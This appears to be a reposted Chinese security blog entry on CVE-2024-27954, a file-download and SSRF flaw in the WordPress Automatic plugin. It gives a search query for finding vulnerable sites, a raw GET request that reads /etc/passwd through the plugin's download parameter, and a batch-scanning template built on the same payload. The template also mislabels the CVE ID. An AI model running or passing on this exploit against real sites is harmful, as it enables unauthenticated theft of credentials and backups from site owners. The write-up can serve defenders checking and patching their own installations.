CVE-2024-27954:WordPress Automatic 插件任意文件下载和SSRF漏洞

admin 2024年4月19日22:04:17评论6 views字数 1867阅读6分13秒阅读模式

CVE-2024-27954:WordPress Automatic 插件任意文件下载和SSRF漏洞

漏洞简介

        WordPress Automatic 插件<3.92.1易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件。此漏洞已在3.92.1版本中修补。

漏洞复现

步骤一:使用以下语法搜索资产并确定测试目标...

# 搜索语法"/wp-content/plugins/wp-automatic"

步骤二:向目标中发送以下数据包并在相应包中返回读取文件的内容...或直接凭借访问URL也可...

GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

CVE-2024-27954:WordPress Automatic 插件任意文件下载和SSRF漏洞

批量脚本

id: CVE-2024-27954info:  name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF  author: LY  severity: critical  description: |    WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.  reference:    - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/    - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954  classification:    cvss-score: 9.8    cve-id: CVE-2022-1970    cwe-id: CWE-918  metadata:    verified: true    max-request: 1    publicwww-query: "/wp-content/plugins/wp-automatic"  tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatichttp:  - method: GET    path:      - "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"    matchers-condition: and    matchers:      - type: word        part: body        words:          - '"link":"file:'      - type: regex        regex:          - "root:.*:0:0:"# digest: 4b0a00483046022100f4561d82424240be6c3dc4fc29a070e44885e39d14ffcdbddae881eeaf89d958022100cf500bf58250d2b5bf2a94220a8afcd8531d91b7d914c46d485700c5558887ac:922c64590222798bb761d5b6d8e72950

        

原文始发于微信公众号(揽月安全团队):CVE-2024-27954:WordPress Automatic 插件任意文件下载和SSRF漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日22:04:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-27954:WordPress Automatic 插件任意文件下载和SSRF漏洞https://cn-sec.com/archives/2651127.html

发表评论

匿名网友 填写信息